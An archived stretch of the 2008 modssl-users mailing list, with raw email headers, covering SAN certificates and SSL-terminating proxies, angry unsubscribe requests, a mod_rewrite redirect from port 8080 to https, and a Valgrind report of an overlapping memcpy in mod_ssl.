X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


--NextPart_Webmail_9m3u9jl4l_25854_1216063486_0
Content-Type: text/plain
Content-Transfer-Encoding: 8bit

THANK'S 
-------------- Original message from "Shahadat Hossain" : -------------- 


you know what, You are a f***en idiot.
if you do not want to receive these emails, just get your name taken off from the list instead of b-shitting. 

send an email to majordomo@modssl.org address (you can also find it at the bottom of this message) with subject as 'Remove me'.

ok?


On Mon, Jul 14, 2008 at 7:10 PM,  wrote:

stop stop  sending me 
this bs , i have no idea  who are you !!!!
stop !!!!!!!!!!!!!!!
-------------- Original message from Dave Paris : -------------- 


> It seem like you might be confusing "shared infrastructure" with 
> "single ip". As others have said, you need a distinct address for each 
> SSL-enabled httpd or proxy, although they can reside on the same hardware. 
> 
> A good example of this is the typical configuration for larger server 
> farms. You find multiple High Availability load balancers in the DMZ for 
> both http and https using something like ha/keepalived for linux. These 
> proxy the incoming request back into private address space. The SSL 
> proxies terminate the SSL connection and broker the request on behalf of 
> the user and everything goes to the private address space in plain http. 
> This allows each of the _real_ webservers to achieve better 
> performance since the SSL overhead is not present. 
> 
> While you can use Apache as an SSL-terminating proxy, I find I get 
> better performance, lower memory utilization and easier configuration 
> using Pound ( http://www.apsis.ch/pound/ ). Using keepalived, I have 
> multiple public IP addresses floating between several hosts and pound 
> binds https to those addresses. 
> 
> Hope that adds a bit of additional clarity, 
> Dave 
> 
> Cuesta Gilles sent forth: 
> > So what about this ? 
> > "*MULTIPLE CN (SAN) SERVER CERTIFICATES* 
> > 
> > This type of certificate (also called /Subject Alternative Name/ (SAN) ) 
> > enables to secure not only one website but a large number of sites (a 
> > list of sites) hosted on a shared infrastructure (server with multiple 
> > names, reverse proxy). Ideal to secure multiple brands of a corporation. 
> > One certificate per hardware is required." 
> > 
> > http://www.tbs-certificats.com/index.html.en 
> > 
> ______________________________________________________________________ 
> Apache Interface to OpenSSL (mod_ssl) www.modssl.org 
> User Support Mailing List modssl-users@modssl.org 
> Automated List Manager majordomo@modssl.org 

--NextPart_Webmail_9m3u9jl4l_25854_1216063486_0
Content-Type: multipart/related; boundary="NextPart_Webmail_9m3u9jl4l_25854_1216063486_1"


--NextPart_Webmail_9m3u9jl4l_25854_1216063486_1
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: quoted-printable









THANK'S 


-------------- Original message from "Shahadat Hossain" <=
shahadat9612@gmail.com>: -------------- 



you know what, You are a f***en idiot.


if you do not want to receive these emails, just get your name taken o=
ff from the list instead of b-shitting. 


 


send an email to majordomo@mod=
ssl.org address (you can also find it at the bottom of this message) wi=
th subject as 'Remove me'.


 


ok?



On Mon, Jul 14, 2008 at 7:10 PM, <erika20@bellsouth.net> wrote:








stop stop  sending me 


this bs , i have no idea  who are =
you !!!!


stop !!!!!!!!!!!!!!!


-------------- Original message from Dave Paris <dparis@w3works.com>: =
-------------- 


> It seem like you might be confusing "shared=
 infrastructure" with 
> "single ip". As others have said, you need a=
 distinct address for each 
> SSL-enabled httpd or proxy, although th=
ey can reside on the same hardware. 
> 
> A good example of thi=
s is the typical configuration for larger server 
> farms. You find m=
ultiple High Availability load balancers in the DMZ for 
> both http =
and https using something like ha/keepalived for linux. These 
> prox=
y the incoming request back into private address space. The SSL 
> pr=
oxies terminate the SSL connection and broker the request on behalf of 
=
> the user and everything goes to the private address space in plain htt=
p. 
> This allows each of the _real_ webservers to achieve better > performance since the SSL overhead is not present. 
> 
> =
While you can use Apache as an SSL-terminating proxy, I find I get 
>=
 better performance, lower memory utilization and easier configuration 
=
> using Pound ( h=
ttp://www.apsis.ch/pound/ ). Using keepalived, I have 
> multiple=
 public IP addresses floating between several hosts and pound 
> bind=
s https to those addresses. 
> 
> Hope that adds a bit of addit=
ional clarity, 
> Dave 
> 
> Cuesta Gilles sent forth: > > So what about this ? 
> > "*MULTIPLE CN (SAN) SERVER C=
ERTIFICATES* 
> > 
> > This type of certificate (also cal=
led /Subject Alternative Name/ (SAN) ) 
> > enables to secure not =
only one website but a large number of sites (a 
> > list of sites=
) hosted on a shared infrastructure (server with multiple 
> > nam=
es, reverse proxy). Ideal to secure multiple brands of a corporation. 
&=
gt; > One certificate per hardware is required." 
> > 
> =
> http://www.tbs-certificats.com/index.html.en 
> > 
> =
______________________________________________________________________ 
=
> Apache Interface to OpenSSL (mod_ssl) www.modssl.org 
> User Support Mailing List modssl-users@modss=
l.org 
> Automated List Manager majordomo@modssl.org 







--NextPart_Webmail_9m3u9jl4l_25854_1216063486_1--

--NextPart_Webmail_9m3u9jl4l_25854_1216063486_0--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 14 22:14:23 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 41D3514DA59; Mon, 14 Jul 2008 22:14:23 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from neptune.customer.net (neptune.serve.net [66.114.248.42])
	by master.modssl.org (Postfix) with ESMTP id 5F62414D9EE
	for ; Mon, 14 Jul 2008 22:14:22 +0200 (CEST)
Received: from mars.customer.net (mars.customer.net [10.254.2.20])
	by neptune.customer.net (Postfix) with ESMTP id 9991D9C02D
	for ; Mon, 14 Jul 2008 13:13:23 -0700 (PDT)
Received: from [192.168.228.20] (unverified [66.114.249.242]) 
	by mars.customer.net (SurgeMail 3.9e) with ESMTP id 945462-1879441 
	for ; Mon, 14 Jul 2008 13:13:23 -0700
Message-ID: <487BB362.2080907@zis.com>
Date: Mon, 14 Jul 2008 13:13:22 -0700
From: Robert Uzgalis 
User-Agent: Thunderbird 2.0.0.14 (Windows/20080421)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: wrong e-mail !!!!!!!!!!!!!!!!!!!!!!!
References: <410-220087410202352796@thepinc.com> <4877124F.40604@werum.de> <4877138E.70608@gmail.com> <48772E49.2050107@werum.de> <48773992.2080705@gmail.com> <487752EE.3020701@w3works.com> <071420081810.22034.487B9684000ACF8F0000561222218675169B0A02D2089B9A019C04040A0DBFCFCD0E05079D0A@att.net>
In-Reply-To: <071420081810.22034.487B9684000ACF8F0000561222218675169B0A02D2089B9A019C04040A0DBFCFCD0E05079D0A@att.net>
Content-Type: multipart/alternative;
 boundary="------------010304070307090107000005"
X-Originating-IP: 66.114.249.242
X-Authenticated-User: buz@tigertail.net 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Robert Uzgalis 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.
--------------010304070307090107000005
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit

One small comment.  I have tried for years to get off this mailing list.
I have sent my request and it has always been effective, for say a month 
or so,
then I get put back on the mailing list.  And it keeps coming.  My 
solution was
to add it to my spam filter.  It doesn't bother me that way and 
occasionally I drop in
to see what the latest complaint is.

In this case I couldn't agree with the message more.  Perhaps the tone 
is not quite right.
Somebody ought to fix mailing-list software so that once you are off you 
are really gone.
It is true that erika20@bellsouth.net ought to ask to be taken off the 
list; but it won't help much I'm afraid.

BUZ

erika20@bellsouth.net wrote:
> stop stop  sending me
> this bs , i have no idea  who are you !!!!
> stop !!!!!!!!!!!!!!!
>
>     -------------- Original message from Dave Paris
>     : --------------
>
>
>     > It seem like you might be confusing "shared infrastructure" with
>     > "single ip". As others have said, you need a distinct address
>     for each
>     > SSL-enabled httpd or proxy, although they can reside on the same
>     hardware.
>     >
>     > A good example of this is the typical configuration for larger
>     server
>     > farms. You find multiple High Availability load balancers in the
>     DMZ for
>     > both http and https using something like ha/keepalived for
>     linux. These
>     > proxy the incoming request back into private address space. The SSL
>     > proxies terminate the SSL connection and broker the request on
>     behalf of
>     > the user and everything goes to the private address space in
>     plain http.
>     > This allows each of the _real_ webservers to achieve better
>     > performance since the SSL overhead is not present.
>     >
>     > While you can use Apache as an SSL-terminating proxy, I find I get
>     > better performance, lower memory utilization and easier
>     configuration
>     > using Pound ( http://www.apsis.ch/pound/ ). Using keepalived, I
>     have
>     > multiple public IP addresses floating between several hosts and
>     pound
>     > binds https to those addresses.
>     >
>     > Hope that adds a bit of additional clarity,
>     > Dave
>     >
>     > Cuesta Gilles sent forth:
>     > > So what about this ?
>     > > "*MULTIPLE CN (SAN) SERVER CERTIFICATES*
>     > >
>     > > This type of certificate (also called /Subject Alternative
>     Name/ (SAN) )
>     > > enables to secure not only one website but a large number of
>     sites (a
>     > > list of sites) hosted on a shared infrastructure (server with
>     multiple
>     > > names, reverse proxy). Ideal to secure multiple brands of a
>     corporation.
>     > > One certificate per hardware is required."
>     > >
>     > > http://www.tbs-certificats.com/index.html.en
>     > >
>     >
>     ______________________________________________________________________
>
>     > Apache Interface to OpenSSL (mod_ssl) www.modssl.org
>     > User Support Mailing List modssl-users@modssl.org
>     > Automated List Manager majordomo@modssl.org 
>


--------------010304070307090107000005
Content-Type: text/html; charset=UTF-8
Content-Transfer-Encoding: 8bit




  
  


One small comment.  I have tried for years to get off this mailing list.

I have sent my request and it has always been effective, for say a
month or so,

then I get put back on the mailing list.  And it keeps coming.  My
solution was

to add it to my spam filter.  It doesn't bother me that way and
occasionally I drop in

to see what the latest complaint is.



In this case I couldn't agree with the message more.  Perhaps the tone
is not quite right.

Somebody ought to fix mailing-list software so that once you are off
you are really gone.

It is true that erika20@bellsouth.net ought to ask to be taken off the
list; but it won't help much I'm afraid.



BUZ



erika20@bellsouth.net wrote:



  
stop stop 
  sending me 

  
this bs , i have no idea  who are
you !!!!

  
stop !!!!!!!!!!!!!!!

  
--------------
Original message from Dave Paris <dparis@w3works.com>:
-------------- 

    

    

> It seem like you might be confusing "shared infrastructure" with 

> "single ip". As others have said, you need a distinct address for
each 

> SSL-enabled httpd or proxy, although they can reside on the same
hardware. 

> 

> A good example of this is the typical configuration for larger
server 

> farms. You find multiple High Availability load balancers in the
DMZ for 

> both http and https using something like ha/keepalived for linux.
These 

> proxy the incoming request back into private address space. The
SSL 

> proxies terminate the SSL connection and broker the request on
behalf of 

> the user and everything goes to the private address space in plain
http. 

> This allows each of the _real_ webservers to achieve better 

> performance since the SSL overhead is not present. 

> 

> While you can use Apache as an SSL-terminating proxy, I find I get
    

> better performance, lower memory utilization and easier
configuration 

> using Pound ( http://www.apsis.ch/pound/ ). Using keepalived, I
have 

> multiple public IP addresses floating between several hosts and
pound 

> binds https to those addresses. 

> 

> Hope that adds a bit of additional clarity, 

> Dave 

> 

> Cuesta Gilles sent forth: 

> > So what about this ? 

> > "*MULTIPLE CN (SAN) SERVER CERTIFICATES* 

> > 

> > This type of certificate (also called /Subject Alternative
Name/ (SAN) ) 

> > enables to secure not only one website but a large number of
sites (a 

> > list of sites) hosted on a shared infrastructure (server with
multiple 

> > names, reverse proxy). Ideal to secure multiple brands of a
corporation. 

> > One certificate per hardware is required." 

> > 

> > http://www.tbs-certificats.com/index.html.en 

> > 

>
______________________________________________________________________ 

> Apache Interface to OpenSSL (mod_ssl) www.modssl.org 

> User Support Mailing List modssl-users@modssl.org 

> Automated List Manager majordomo@modssl.org 









--------------010304070307090107000005--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 17 17:40:01 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 17BE014DA47; Thu, 17 Jul 2008 17:40:01 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from impeva.com (impeva.com [198.104.184.47])
	by master.modssl.org (Postfix) with ESMTP id 9294614D866
	for ; Thu, 17 Jul 2008 17:40:00 +0200 (CEST)
Received: from IMPDELL30 (static-24-214-233-83.knology.net [24.214.233.83] (may be forged))
	(authenticated bits=0)
	by impeva.com (8.13.6.20060614/8.13.6) with ESMTP id m6HFd10C027291
	for ; Thu, 17 Jul 2008 15:39:02 GMT
Message-ID: <049b01c8e823$3b285ee0$0f1aa8c0@IMPDELL30>
From: "Tim Hester" 
To: 
Subject: redirect port
Date: Thu, 17 Jul 2008 10:38:11 -0500
Organization: Impeva Labs, Inc
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0492_01C8E7F9.357CE670"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.3138
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.3198
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Tim Hester" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0492_01C8E7F9.357CE670
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: quoted-printable

I have been using Apache/2.2.3 and Tomcat 5.5 as standalone servers. I'm =

adding ssl with mod_jk and mod_proxy_ajp to access tomcat via ssl.

I access my static content and cgi via http://www.mydomain.com/ and use=20
mod_rewrite in .htaccess to redirect to https. This works fine as =
desired.

I can access my webapp via http://www.mydomain.com:8080/MyWebApp, and =
this=20
is the url users have book marked. This continues to work. I can also =
access=20
https://www.mydomain.com/MyWebApp.

What I'd like to do is force a redirect from=20
http://www.mydomain.com:8080/MyWebApp to =
https://www.mydomain.com/MyWebApp

Note; tomcat is not under the apache webroot

Any assistance appreciated.

Thanks

Tim

------=_NextPart_000_0492_01C8E7F9.357CE670
Content-Type: text/html;
	charset="Windows-1252"
Content-Transfer-Encoding: quoted-printable









I have been using Apache/2.2.3 and Tomcat 5.5 as standalone =
servers. I'm=20

adding ssl with mod_jk and mod_proxy_ajp to access tomcat via =
ssl.

I=20
access my static content and cgi via http://www.mydomain.com/ and=20
use 
mod_rewrite in .htaccess to redirect to https. This works fine =
as=20
desired.

I can access my webapp via http://www.mydomain.com:8080/MyWebApp, and this 
is the =
url users=20
have book marked. This continues to work. I can also access 
https://www.mydomain.com/MyWebApp.

What I'd like to =
do is=20
force a redirect from 
http://www.mydomain.com:8080/MyWebApp=20
to https://www.mydomain.com/MyWebApp

Note; =
tomcat is not=20
under the apache webroot

Any assistance=20
appreciated.

Thanks

Tim


------=_NextPart_000_0492_01C8E7F9.357CE670--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 17 23:06:31 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2560514DA56; Thu, 17 Jul 2008 23:06:31 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from impeva.com (impeva.com [198.104.184.47])
	by master.modssl.org (Postfix) with ESMTP id 7A23E14DA47
	for ; Thu, 17 Jul 2008 23:06:30 +0200 (CEST)
Received: from IMPDELL30 (static-24-214-233-83.knology.net [24.214.233.83] (may be forged))
	(authenticated bits=0)
	by impeva.com (8.13.6.20060614/8.13.6) with ESMTP id m6HL5Ukf045891
	for ; Thu, 17 Jul 2008 21:05:31 GMT
Message-ID: <1db601c8e850$d5d5de90$0f1aa8c0@IMPDELL30>
From: "Tim Hester" 
To: 
References: <049b01c8e823$3b285ee0$0f1aa8c0@IMPDELL30>
Subject: Re: redirect port
Date: Thu, 17 Jul 2008 16:03:25 -0500
Organization: Impeva Labs, Inc
MIME-Version: 1.0
Content-Type: text/plain;
	format=flowed;
	charset="Windows-1252";
	reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.3138
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.3198
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Tim Hester" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

A few more hours of investigation revealed the solution;

 RewriteCond %{HTTP_HOST}   ^www.mydomain.com:8080 [NC]
 RewriteRule ^/(.*) https://www.mydomain.com/$1 [L,R=301]

Sorry bout the html mail earlier.

Tim

----- Original Message ----- 
From: Tim Hester
To: modssl-users@modssl.org
Sent: Thursday, July 17, 2008 10:38 AM
Subject: redirect port


I have been using Apache/2.2.3 and Tomcat 5.5 as standalone servers. I'm
adding ssl with mod_jk and mod_proxy_ajp to access tomcat via ssl.

I access my static content and cgi via http://www.mydomain.com/ and use
mod_rewrite in .htaccess to redirect to https. This works fine as desired.

I can access my webapp via http://www.mydomain.com:8080/MyWebApp, and this
is the url users have book marked. This continues to work. I can also access
https://www.mydomain.com/MyWebApp.

What I'd like to do is force a redirect from
http://www.mydomain.com:8080/MyWebApp to https://www.mydomain.com/MyWebApp

Note; tomcat is not under the apache webroot

Any assistance appreciated.

Thanks

Tim 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 18 19:06:05 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 17CE114DA34; Fri, 18 Jul 2008 19:06:05 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from vultus5.telsey.it (vultus5.telsey.it [85.18.56.10])
	by master.modssl.org (Postfix) with ESMTP id B09E314D835
	for ; Fri, 18 Jul 2008 19:06:04 +0200 (CEST)
Received: from mail.telsey.it ([172.19.8.52]:36311)
	by telsey.it with [XMail 1.25 ESMTP Server]
	id  for  from ;
	Fri, 18 Jul 2008 19:02:55 +0200
Received: from mail.telsey.it
	by telsey.it with [XMail 1.22 ESMTP Server]
	id  for  from ;
	Fri, 18 Jul 2008 19:05:06 +0200
Received: from [172.25.9.10] ([172.25.9.10]) by mail.telsey.it with Microsoft SMTPSVC(5.0.2195.6713);
	 Fri, 18 Jul 2008 19:05:05 +0200
Message-ID: <4880CD40.6080201@telsey.it>
Date: Fri, 18 Jul 2008 18:05:04 +0100
From: Frederic Heem 
User-Agent: Thunderbird 1.5.0.12 (X11/20070719)
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: overlapping memcpy
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-OriginalArrivalTime: 18 Jul 2008 17:05:06.0015 (UTC) FILETIME=[6D1C16F0:01C8E8F8]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Frederic Heem 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,
Valgrind has found a problem related to an overlapping memcpy in mod_ssl 
(Apache/2.2.9 (Unix)), here is the output:

==18546== Thread 5:
==18546== Source and destination overlap in memcpy(0x425E0E8, 0x425E10E, 
141)
==18546==    at 0x4007A42: memcpy (mc_replace_strmem.c:402)
==18546==    by 0x446C464: ssl_io_input_read (in 
/usr/local/apache2/modules/mod_ssl.so)
==18546==    by 0x446C781: ssl_io_filter_input (in 
/usr/local/apache2/modules/mod_ssl.so)
==18546==    by 0x8068DB5: ap_rgetline_core (in 
/usr/local/apache2/bin/httpd)
==18546==    by 0x80690CE: ap_get_mime_headers_core (in 
/usr/local/apache2/bin/httpd)
==18546==    by 0x80696FC: ap_read_request (in /usr/local/apache2/bin/httpd)
==18546==    by 0x80799DA: ap_process_http_connection (in 
/usr/local/apache2/bin/httpd)
==18546==    by 0x8076CEC: ap_run_process_connection (in 
/usr/local/apache2/bin/httpd)
==18546==    by 0x807FFD3: worker_thread (in /usr/local/apache2/bin/httpd)
==18546==    by 0x4057603: dummy_worker (in 
/usr/local/apache2/lib/libapr-1.so.0.3.0)
==18546==    by 0x8E145A: start_thread (in /lib/libpthread-2.5.so)
==18546==    by 0x71323D: clone (in /lib/libc-2.5.so)

This happens when an axis2 client sends a https request.
Let me know if you need more information.
Frederic Heem



______________________________________________________________________________

--- NOTICE ---

This  email  and  any  attachments  are  confidential and are intended for the
addressee  only.  If you have received this message by mistake, please contact
us  immediately and  then  delete the message from your system.   You must not
copy, distribute, disclose  or  act upon the contents of this email.  Personal
and corporate data submitted will be used in a correct, transparent and lawful
manner. The data collected will be processed in paper or computerized form for
the  performance  of  contractual  and  lawful  obligations as well as for the
effective  management of business relationship.   The data processor is Telsey
S.p.A.   The  data  subject may exercise all the rights set forth in art. 7 of
Law  by  Decree  30.06.2003  n.  196   as   reported   in  the  following  url
http://www.telsey.com/privacy.asp.

______________________________________________________________________________
798t8RfNa6Dl8Ilf
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jul 19 03:18:10 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id B50CE14DA52; Sat, 19 Jul 2008 03:18:10 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from fmailhost01.isp.att.net (fmailhost01.isp.att.net [207.115.11.51])
	by master.modssl.org (Postfix) with ESMTP id 00C8E14D86A
	for ; Sat, 19 Jul 2008 03:18:06 +0200 (CEST)
Received: from fwebmail12.isp.att.net ([204.127.221.112])
          by isp.att.net (frfwmhc01) with SMTP
          id <20080719011706H0100m6i2ce>; Sat, 19 Jul 2008 01:17:06 +0000
X-Originating-IP: [204.127.221.112]
Received: from [66.176.74.215] by fwebmail12.isp.att.net;
	Sat, 19 Jul 2008 01:17:06 +0000
From: erika20@bellsouth.net
To: modssl-users@modssl.org
Subject: stop sending me this stuff please !!!!!!!!!!!
Date: Sat, 19 Jul 2008 01:17:06 +0000
Message-Id: <071920080117.25968.4881409200045E0E0000657022230680329B0A02D2089B9A019C04040A0DBFCFCD0E05079D0A@att.net>
In-Reply-To: <4880CD40.6080201@telsey.it>
X-Mailer: AT&T Message Center Version 1 (Jun 10 2008)
X-Authenticated-Sender: ZXJpa2EyMEBiZWxsc291dGgubmV0
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="NextPart_Webmail_9m3u9jl4l_25968_1216430226_0"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: erika20@bellsouth.net
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


--NextPart_Webmail_9m3u9jl4l_25968_1216430226_0
Content-Type: text/plain
Content-Transfer-Encoding: 8bit

stop sendig me this 
stuff please !!!!
take me out of your mailing list !!! thanks 
-------------- Original message from Frederic Heem : -------------- 


> Hi, 
> Valgrind has found a problem related to an overlapping memcpy in mod_ssl 
> (Apache/2.2.9 (Unix)), here is the output: 
> 
> ==18546== Thread 5: 
> ==18546== Source and destination overlap in memcpy(0x425E0E8, 0x425E10E, 
> 141) 
> ==18546== at 0x4007A42: memcpy (mc_replace_strmem.c:402) 
> ==18546== by 0x446C464: ssl_io_input_read (in 
> /usr/local/apache2/modules/mod_ssl.so) 
> ==18546== by 0x446C781: ssl_io_filter_input (in 
> /usr/local/apache2/modules/mod_ssl.so) 
> ==18546== by 0x8068DB5: ap_rgetline_core (in 
> /usr/local/apache2/bin/httpd) 
> ==18546== by 0x80690CE: ap_get_mime_headers_core (in 
> /usr/local/apache2/bin/httpd) 
> ==18546== by 0x80696FC: ap_read_request (in /usr/local/apache2/bin/httpd) 
> ==18546== by 0x80799DA: ap_process_http_connection (in 
> /usr/local/apache2/bin/httpd) 
> ==18546== by 0x8076CEC: ap_run_process_connection (in 
> /usr/local/apache2/bin/httpd) 
> ==18546== by 0x807FFD3: worker_thread (in /usr/local/apache2/bin/httpd) 
> ==18546== by 0x4057603: dummy_worker (in 
> /usr/local/apache2/lib/libapr-1.so.0.3.0) 
> ==18546== by 0x8E145A: start_thread (in /lib/libpthread-2.5.so) 
> ==18546== by 0x71323D: clone (in /lib/libc-2.5.so) 
> 
> This happens when an axis2 client sends a https request. 
> Let me know if you need more information. 
> Frederic Heem 
> 
> 
> 
> ______________________________________________________________________________ 
> 
> --- NOTICE --- 
> 
> This email and any attachments are confidential and are intended for the 
> addressee only. If you have received this message by mistake, please contact 
> us immediately and then delete the message from your system. You must not 
> copy, distribute, disclose or act upon the contents of this email. Personal 
> and corporate data submitted will be used in a correct, transparent and lawful 
> manner. The data collected will be processed in paper or computerized form for 
> the performance of contractual and lawful obligations as well as for the 
> effective management of business relationship. The data processor is Telsey 
> S.p.A. The data subject may exercise all the rights set forth in art. 7 of 
> Law by Decree 30.06.2003 n. 196 as reported in the following url 
> http://www.telsey.com/privacy.asp. 
> 
> ______________________________________________________________________________ 
> 798t8RfNa6Dl8Ilf 
> ______________________________________________________________________ 
> Apache Interface to OpenSSL (mod_ssl) www.modssl.org 
> User Support Mailing List modssl-users@modssl.org 
> Automated List Manager majordomo@modssl.org 

--NextPart_Webmail_9m3u9jl4l_25968_1216430226_0
Content-Type: multipart/related; boundary="NextPart_Webmail_9m3u9jl4l_25968_1216430226_1"


--NextPart_Webmail_9m3u9jl4l_25968_1216430226_1
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: quoted-printable









stop sendig me this 


stuff please !!!!


take me out of your mailing list !!! th=
anks 


-------------- Original message from Frederic Heem <frede=
ric.heem@telsey.it>: -------------- 


> Hi, 
> Valgri=
nd has found a problem related to an overlapping memcpy in mod_ssl 
>=
 (Apache/2.2.9 (Unix)), here is the output: 
> 
> =3D=3D18546=
=3D=3D Thread 5: 
> =3D=3D18546=3D=3D Source and destination overlap =
in memcpy(0x425E0E8, 0x425E10E, 
> 141) 
> =3D=3D18546=3D=3D at=
 0x4007A42: memcpy (mc_replace_strmem.c:402) 
> =3D=3D18546=3D=3D by =
0x446C464: ssl_io_input_read (in 
> /usr/local/apache2/modules/mod_ss=
l.so) 
> =3D=3D18546=3D=3D by 0x446C781: ssl_io_filter_input (in 
=
> /usr/local/apache2/modules/mod_ssl.so) 
> =3D=3D18546=3D=3D by 0=
x8068DB5: ap_rgetline_core (in 
> /usr/local/apache2/bin/httpd) 
&=
gt; =3D=3D18546=3D=3D by 0x80690CE: ap_get_mime_headers_core (in 
> /=
usr/local/apache2/bin/httpd) 
> =3D=3D18546=3D=3D by 0x80696FC: ap_re=
ad_request (in /usr/local/apache2/bin/httpd) 
> =3D=3D18546=3D=3D by =
0x80799DA: ap_process_http_connection (in 
> /usr/local/apache2/bin/h=
ttpd) 
> =3D=3D18546=3D=3D by 0x8076CEC: ap_run_process_connection (i=
n 
> /usr/local/apache2/bin/httpd) 
> =3D=3D18546=3D=3D by 0x80=
7FFD3: worker_thread (in /usr/local/apache2/bin/httpd) 
> =3D=3D18546=
=3D=3D by 0x4057603: dummy_worker (in 
> /usr/local/apache2/lib/libap=
r-1.so.0.3.0) 
> =3D=3D18546=3D=3D by 0x8E145A: start_thread (in /lib=
/libpthread-2.5.so) 
> =3D=3D18546=3D=3D by 0x71323D: clone (in /lib/=
libc-2.5.so) 
> 
> This happens when an axis2 client sends a ht=
tps request. 
> Let me know if you need more information. 
> Fr=
ederic Heem 
> 
> 
> 
> ___________________________=
___________________________________________________ 
> 
> --- N=
OTICE --- 
> 
> This email and any attachments are confidential=
 and are intended for the 
> addressee only. If you have received thi=
s message by mistake, please contact 
> us immediately and then delet=
e the message from your system. You must not 
> copy, distribute, dis=
close or act upon the contents of this email. Personal 
> and corpora=
te data submitted will be used in a correct, transparent and lawful 
>=
; manner. The data collected will be processed in paper or computerized for=
m for 
> the performance of contractual and lawful obligations as wel=
l as for the 
> effective management of business relationship. The da=
ta processor is Telsey 
> S.p.A. The data subject may exercise all th=
e rights set forth in art. 7 of 
> Law by Decree 30.06.2003 n. 196 as=
 reported in the following url 
> http://www.telsey.com/privacy.asp. =

> 
> _________________________________________________________=
_____________________ 
> 798t8RfNa6Dl8Ilf 
> __________________=
____________________________________________________ 
> Apache Interf=
ace to OpenSSL (mod_ssl) www.modssl.org 
> User Support Mailing List =
modssl-users@modssl.org 
> Automated List Manager majordomo@modssl.or=
g 






--NextPart_Webmail_9m3u9jl4l_25968_1216430226_1--

--NextPart_Webmail_9m3u9jl4l_25968_1216430226_0--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Jul 20 02:41:48 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 1499114D85E; Sun, 20 Jul 2008 02:41:48 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from smtp.nist.gov (rimp2.nist.gov [129.6.16.227])
	by master.modssl.org (Postfix) with ESMTP id 9E78A14D840
	for ; Sun, 20 Jul 2008 02:41:47 +0200 (CEST)
Received: from franklin.boulder.nist.gov (franklin.boulder.nist.gov [132.163.128.80])
	by smtp.nist.gov (8.13.1/8.13.1) with ESMTP id m6K0egJD010878
	for ; Sat, 19 Jul 2008 20:40:43 -0400
Received: from localhost.localdomain ([132.163.254.198])
	by franklin.boulder.nist.gov (8.13.1/8.13.1) with ESMTP id m6K0efGx010147
	for ; Sat, 19 Jul 2008 18:40:42 -0600
